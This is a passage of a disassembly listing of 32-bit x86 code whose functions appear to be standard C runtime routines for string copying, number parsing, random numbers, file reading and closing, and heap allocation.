xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_4144DC
mov eax, [edi-4]
test al, al
jz short loc_41451C
test ah, ah
jz short loc_414517
test eax, 0FF0000h
jz short loc_414512
test eax, 0FF000000h
jnz short loc_4144DC
loc_41450D: ; CODE XREF: sub_4144B0+22�j
sub edi, 1
jmp short loc_41451F
; ---------------------------------------------------------------------------
loc_414512: ; CODE XREF: sub_4144B0+54�j
sub edi, 2
jmp short loc_41451F
; ---------------------------------------------------------------------------
loc_414517: ; CODE XREF: sub_4144B0+4D�j
sub edi, 3
jmp short loc_41451F
; ---------------------------------------------------------------------------
loc_41451C: ; CODE XREF: sub_4144B0+49�j
sub edi, 4
loc_41451F: ; CODE XREF: sub_4144B0+60�j
; sub_4144B0+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_414534
mov ebx, ecx
shr ecx, 2
jnz short loc_41458E
jmp short loc_414556
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4144B0+79�j
; sub_4144B0+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_41457A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_414570
test esi, 3
jnz short loc_414534
mov ebx, ecx
shr ecx, 2
jnz short loc_41458E
loc_414556: ; CODE XREF: sub_4144B0+82�j
; sub_4144B0+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_414570
loc_41455D: ; CODE XREF: sub_4144B0+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_414572
sub ecx, 1
jnz short loc_41455D
loc_414570: ; CODE XREF: sub_4144B0+95�j
; sub_4144B0+AB�j
mov [edi], cl
loc_414572: ; CODE XREF: sub_4144B0+B9�j
pop ebx
pop esi
loc_414574: ; CODE XREF: sub_4144B0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41457A: ; CODE XREF: sub_4144B0+8B�j
; sub_4144B0+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_414584: ; CODE XREF: sub_4144B0+F6�j
; sub_4144B0+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_414556
loc_41458E: ; CODE XREF: sub_4144B0+80�j
; sub_4144B0+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_414584
test dl, dl
jz short loc_41457A
test dh, dh
jz short loc_4145DA
test edx, 0FF0000h
jz short loc_4145CA
test edx, 0FF000000h
jnz short loc_414584
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4145CA: ; CODE XREF: sub_4144B0+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4145DA: ; CODE XREF: sub_4144B0+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4144B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4145E5 proc near ; CODE XREF: sub_401000+19�p
; sub_401000+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416662
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_414637
dec [ebp+var_1C]
js short loc_41462A
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_414637
; ---------------------------------------------------------------------------
loc_41462A: ; CODE XREF: sub_4145E5+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4164BB
pop ecx
pop ecx
loc_414637: ; CODE XREF: sub_4145E5+36�j
; sub_4145E5+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_4145E5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414640 proc near ; CODE XREF: sub_401141+2CF�p
; sub_408A18+3F26�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_414667
xor eax, eax
jmp short loc_414669
; ---------------------------------------------------------------------------
loc_414667: ; CODE XREF: sub_414640+21�j
mov eax, edi
loc_414669: ; CODE XREF: sub_414640+25�j
cld
pop edi
leave
retn
sub_414640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414670 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41470F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_41469C
shr ecx, 2
jnz loc_41471F
jmp short loc_4146C3
; ---------------------------------------------------------------------------
loc_41469C: ; CODE XREF: sub_414670+1F�j
; sub_414670+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_4146D6
test al, al
jz short loc_4146DE
test esi, 3
jnz short loc_41469C
mov ebx, ecx
shr ecx, 2
jnz short loc_41471F
loc_4146BE: ; CODE XREF: sub_414670+AD�j
and ebx, 3
jz short loc_4146D6
loc_4146C3: ; CODE XREF: sub_414670+2A�j
; sub_414670+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_414708
sub ebx, 1
jnz short loc_4146C3
loc_4146D6: ; CODE XREF: sub_414670+39�j
; sub_414670+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4146DE: ; CODE XREF: sub_414670+3D�j
test edi, 3
jz short loc_4146FC
loc_4146E6: ; CODE XREF: sub_414670+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_41478C
test edi, 3
jnz short loc_4146E6
loc_4146FC: ; CODE XREF: sub_414670+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_414777
loc_414703: ; CODE XREF: sub_414670+9B�j
; sub_414670+116�j
mov [edi], al
add edi, 1
loc_414708: ; CODE XREF: sub_414670+5F�j
sub ebx, 1
jnz short loc_414703
pop ebx
pop esi
loc_41470F: ; CODE XREF: sub_414670+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_414715: ; CODE XREF: sub_414670+C7�j
; sub_414670+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_4146BE
loc_41471F: ; CODE XREF: sub_414670+24�j
; sub_414670+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_414715
test dl, dl
jz short loc_414769
test dh, dh
jz short loc_41475F
test edx, 0FF0000h
jz short loc_414755
test edx, 0FF000000h
jnz short loc_414715
mov [edi], edx
jmp short loc_41476D
; ---------------------------------------------------------------------------
loc_414755: ; CODE XREF: sub_414670+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41476D
; ---------------------------------------------------------------------------
loc_41475F: ; CODE XREF: sub_414670+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41476D
; ---------------------------------------------------------------------------
loc_414769: ; CODE XREF: sub_414670+CB�j
xor edx, edx
mov [edi], edx
loc_41476D: ; CODE XREF: sub_414670+E3�j
; sub_414670+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_414783
loc_414777: ; CODE XREF: sub_414670+91�j
xor eax, eax
loc_414779: ; CODE XREF: sub_414670+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_414779
loc_414783: ; CODE XREF: sub_414670+105�j
and ebx, 3
jnz loc_414703
loc_41478C: ; CODE XREF: sub_414670+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_414670 endp
; =============== S U B R O U T I N E =======================================
sub_414794 proc near ; CODE XREF: sub_401967+39�p
; sub_40253C+2E�p ...
arg_0 = dword ptr 4
call sub_416E15
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_414794 endp
; =============== S U B R O U T I N E =======================================
sub_4147A1 proc near ; CODE XREF: sub_4017F1+57�p
; sub_4017F1:loc_401854�p ...
call sub_416E15
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_4147A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147C3 proc near ; CODE XREF: sub_4017F1+4A�p
; sub_403C3B+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4179C0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_416F0B
add esp, 10h
leave
retn
sub_4147C3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414800 proc near ; CODE XREF: sub_4039C6+8�p
; sub_404AFC+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_414815
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_414815: ; CODE XREF: sub_414800+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_41481A: ; CODE XREF: sub_414800+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41481A
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_414800 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41483D proc near ; CODE XREF: sub_401E87+46�p
; sub_401EFF+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416662
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_41488E
dec [ebp+var_1C]
js short loc_414881
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41488E
; ---------------------------------------------------------------------------
loc_414881: ; CODE XREF: sub_41483D+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4164BB
pop ecx
pop ecx
loc_41488E: ; CODE XREF: sub_41483D+35�j
; sub_41483D+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41483D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414894 proc near ; CODE XREF: sub_401F73+19�p
; sub_4056B0+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416662
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_4148E4
dec [ebp+var_1C]
js short loc_4148D7
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4148E4
; ---------------------------------------------------------------------------
loc_4148D7: ; CODE XREF: sub_414894+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4164BB
pop ecx
pop ecx
loc_4148E4: ; CODE XREF: sub_414894+34�j
; sub_414894+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_414894 endp
; =============== S U B R O U T I N E =======================================
sub_4148EA proc near ; CODE XREF: sub_414972�j
; sub_41DF57+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_416E15
mov edi, [eax+64h]
cmp edi, off_42D83C
jz short loc_414903
call sub_417C4E
mov edi, eax
loc_414903: ; CODE XREF: sub_4148EA+10�j
mov esi, [esp+8+arg_0]
loc_414907: ; CODE XREF: sub_4148EA+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_41491E
push 8
push eax
push edi
call sub_417A4B
add esp, 0Ch
jmp short loc_414928
; ---------------------------------------------------------------------------
loc_41491E: ; CODE XREF: sub_4148EA+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_414928: ; CODE XREF: sub_4148EA+32�j
test eax, eax
jz short loc_41492F
inc esi
jmp short loc_414907
; ---------------------------------------------------------------------------
loc_41492F: ; CODE XREF: sub_4148EA+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_41493F
cmp ecx, 2Bh
jnz short loc_414943
loc_41493F: ; CODE XREF: sub_4148EA+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_414943: ; CODE XREF: sub_4148EA+53�j
xor eax, eax
loc_414945: ; CODE XREF: sub_4148EA+7C�j
cmp ecx, 30h
jl short loc_414954
cmp ecx, 39h
jg short loc_414954
sub ecx, 30h
jmp short loc_414957
; ---------------------------------------------------------------------------
loc_414954: ; CODE XREF: sub_4148EA+5E�j
; sub_4148EA+63�j
or ecx, 0FFFFFFFFh
loc_414957: ; CODE XREF: sub_4148EA+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_414968
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_414945
; ---------------------------------------------------------------------------
loc_414968: ; CODE XREF: sub_4148EA+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_414971
neg eax
locret_414971: ; CODE XREF: sub_4148EA+83�j
retn
sub_4148EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_414972 proc near ; CODE XREF: sub_402011+63�p
; sub_4024E0+12�p ...
jmp sub_4148EA
sub_414972 endp
; =============== S U B R O U T I N E =======================================
sub_414977 proc near ; CODE XREF: sub_4149C3+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_4149BA
push esi
call sub_417DD2
push esi
mov edi, eax
call sub_417DA7
push dword ptr [esi+10h]
call sub_417D0C
add esp, 0Ch
test eax, eax
jge short loc_4149A8
or edi, 0FFFFFFFFh
jmp short loc_4149BA
; ---------------------------------------------------------------------------
loc_4149A8: ; CODE XREF: sub_414977+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_4149BA
push eax
call sub_414A14
and dword ptr [esi+1Ch], 0
pop ecx
loc_4149BA: ; CODE XREF: sub_414977+D�j
; sub_414977+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_414977 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149C3 proc near ; CODE XREF: sub_403BA9+74�p
; sub_408A18+380D�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_428D38
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_4149E9
and dword ptr [esi+0Ch], 0
loc_4149E0: ; CODE XREF: sub_4149C3+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_4149E9: ; CODE XREF: sub_4149C3+17�j
push esi
call sub_417FF8
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_414977
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414A0C
jmp short loc_4149E0
sub_4149C3 endp
; =============== S U B R O U T I N E =======================================
sub_414A09 proc near ; DATA XREF: .rdata:stru_428D38�o
mov esi, [ebp+8]
sub_414A09 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414A0C proc near ; CODE XREF: sub_4149C3+3F�p
push esi
call sub_41804A
pop ecx
retn
sub_414A0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A14 proc near ; CODE XREF: sub_402E1B+74�p
; sub_40668C+CC�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00414A70 SIZE 00000015 BYTES
push 0Ch
push offset stru_428D48
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_414A7F
cmp dword_47C980, 3
jnz short loc_414A70
push 4
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4182FE
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_414A53
push esi
push eax
call sub_418329
pop ecx
pop ecx
loc_414A53: ; CODE XREF: sub_414A14+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414A67
cmp [ebp+var_1C], 0
jnz short loc_414A7F
push [ebp+arg_0]
jmp short loc_414A71
sub_414A14 endp
; =============== S U B R O U T I N E =======================================
sub_414A67 proc near ; CODE XREF: sub_414A14+43�p
; DATA XREF: .rdata:stru_428D48�o
push 4
call sub_4181F1
pop ecx
retn
sub_414A67 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414A14
loc_414A70: ; CODE XREF: sub_414A14+1A�j
push esi
loc_414A71: ; CODE XREF: sub_414A14+51�j
push 0
push dword_47C97C
call ds:dword_420058 ; RtlFreeHeap
loc_414A7F: ; CODE XREF: sub_414A14+11�j
; sub_414A14+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_414A14
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A85 proc near ; CODE XREF: sub_414B6E+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_414AA9
xor eax, eax
jmp loc_414B54
; ---------------------------------------------------------------------------
loc_414AA9: ; CODE XREF: sub_414A85+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_414ABD
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_414AC9
; ---------------------------------------------------------------------------
loc_414ABD: ; CODE XREF: sub_414A85+2E�j
mov [ebp+var_4], 1000h
jmp short loc_414AC9
; ---------------------------------------------------------------------------
loc_414AC6: ; CODE XREF: sub_414A85+C5�j
mov ecx, [ebp+arg_0]
loc_414AC9: ; CODE XREF: sub_414A85+36�j
; sub_414A85+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_414AFB
mov eax, [esi+4]
test eax, eax
jz short loc_414AFB
cmp ecx, eax
mov edi, ecx
jb short loc_414AE0
mov edi, eax
loc_414AE0: ; CODE XREF: sub_414A85+57�j
push edi
push dword ptr [esi]
push ebx
call sub_419140
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_414B46
; ---------------------------------------------------------------------------
loc_414AFB: ; CODE XREF: sub_414A85+4A�j
; sub_414A85+51�j
cmp ecx, [ebp+var_4]
jb short loc_414B2E
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_414B11
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_414B11: ; CODE XREF: sub_414A85+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_419087
add esp, 0Ch
test eax, eax
jz short loc_414B58
cmp eax, 0FFFFFFFFh
jz short loc_414B68
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_414B46
; ---------------------------------------------------------------------------
loc_414B2E: ; CODE XREF: sub_414A85+79�j
push esi
call sub_418DD9
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_414B5C
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_414B46: ; CODE XREF: sub_414A85+74�j
; sub_414A85+A7�j
cmp [ebp+arg_0], 0
jnz loc_414AC6
mov eax, [ebp+arg_8]
loc_414B53: ; CODE XREF: sub_414A85+E1�j
pop esi
loc_414B54: ; CODE XREF: sub_414A85+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414B58: ; CODE XREF: sub_414A85+9B�j
or dword ptr [esi+0Ch], 10h
loc_414B5C: ; CODE XREF: sub_414A85+B3�j
; sub_414A85+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_414B53
; ---------------------------------------------------------------------------
loc_414B68: ; CODE XREF: sub_414A85+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_414B5C
sub_414A85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B6E proc near ; CODE XREF: sub_403BA9+47�p
; sub_411FA9+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_428D58
call __SEH_prolog
push [ebp+arg_C]
call sub_417FF8
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414A85
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414BB0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_414B6E endp
; =============== S U B R O U T I N E =======================================
sub_414BB0 proc near ; CODE XREF: sub_414B6E+34�p
; DATA XREF: .rdata:stru_428D58�o
push dword ptr [ebp+14h]
call sub_41804A
pop ecx
retn
sub_414BB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414BBA proc near ; CODE XREF: sub_41B1CE+34�p
; sub_41B1CE+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00414D2B SIZE 0000003C BYTES
push 14h
push offset stru_428D68
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_414BDD
push [ebp+arg_4]
call sub_414E7D
pop ecx
jmp loc_414D61
; ---------------------------------------------------------------------------
loc_414BDD: ; CODE XREF: sub_414BBA+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_414BF0
push edi
call sub_414A14
pop ecx
jmp loc_414D5F
; ---------------------------------------------------------------------------
loc_414BF0: ; CODE XREF: sub_414BBA+28�j
cmp dword_47C980, 3
jnz loc_414D2B
loc_414BFD: ; CODE XREF: sub_414BBA+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_414CFA
push 4
call sub_418285
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_4182FE
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_414CCA
cmp esi, dword_47C96C
ja short loc_414C7A
push esi
push edi
push eax
call sub_4187FE
add esp, 0Ch
test eax, eax
jz short loc_414C42
mov [ebp+var_1C], edi
jmp short loc_414C7A
; ---------------------------------------------------------------------------
loc_414C42: ; CODE XREF: sub_414BBA+81�j
push esi
call sub_418ADD
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_414C7A
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_414C5D
mov eax, esi
loc_414C5D: ; CODE XREF: sub_414BBA+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_419140
push edi
call sub_4182FE
mov [ebp+var_20], eax
push edi
push eax
call sub_418329
add esp, 18h
loc_414C7A: ; CODE XREF: sub_414BBA+72�j
; sub_414BBA+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_414CCA
cmp esi, ebx
jnz short loc_414C89
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_414C89: ; CODE XREF: sub_414BBA+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_47C97C
call ds:dword_42005C ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_414CCA
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_414CB4
mov eax, esi
loc_414CB4: ; CODE XREF: sub_414BBA+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_419140
push edi
push [ebp+var_20]
call sub_418329
add esp, 14h
loc_414CCA: ; CODE XREF: sub_414BBA+66�j
; sub_414BBA+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414D22
cmp [ebp+var_20], ebx
jnz short loc_414CFA
cmp esi, ebx
jnz short loc_414CDF
xor esi, esi
inc esi
loc_414CDF: ; CODE XREF: sub_414BBA+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_47C97C
call ds:dword_420158 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_414CFA: ; CODE XREF: sub_414BBA+49�j
; sub_414BBA+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_414D61
cmp dword_47C35C, ebx
jz short loc_414D61
push esi
call sub_41947D
pop ecx
test eax, eax
jnz loc_414BFD
jmp short loc_414D5F
sub_414BBA endp
; =============== S U B R O U T I N E =======================================
sub_414D1A proc near ; DATA XREF: .rdata:stru_428D68�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_414D1A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414D22 proc near ; CODE XREF: sub_414BBA+114�p
push 4
call sub_4181F1
pop ecx
retn
sub_414D22 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414BBA
loc_414D2B: ; CODE XREF: sub_414BBA+3D�j
; sub_414BBA+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_414D48
cmp esi, ebx
jnz short loc_414D39
xor esi, esi
inc esi
loc_414D39: ; CODE XREF: sub_414BBA+17A�j
push esi
push edi
push ebx
push dword_47C97C
call ds:dword_420158 ; RtlReAllocateHeap
loc_414D48: ; CODE XREF: sub_414BBA+176�j
cmp eax, ebx
jnz short loc_414D61
cmp dword_47C35C, ebx
jz short loc_414D61
push esi
call sub_41947D
pop ecx
test eax, eax
jnz short loc_414D2B
loc_414D5F: ; CODE XREF: sub_414BBA+31�j
; sub_414BBA+15E�j
xor eax, eax
loc_414D61: ; CODE XREF: sub_414BBA+1E�j
; sub_414BBA+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_414BBA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D67 proc near ; CODE XREF: sub_414DC3+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_428D78
call __SEH_prolog
call sub_419685
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_414D8E
call sub_419600
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_414DB3
; ---------------------------------------------------------------------------
loc_414D8E: ; CODE XREF: sub_414D67+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419498
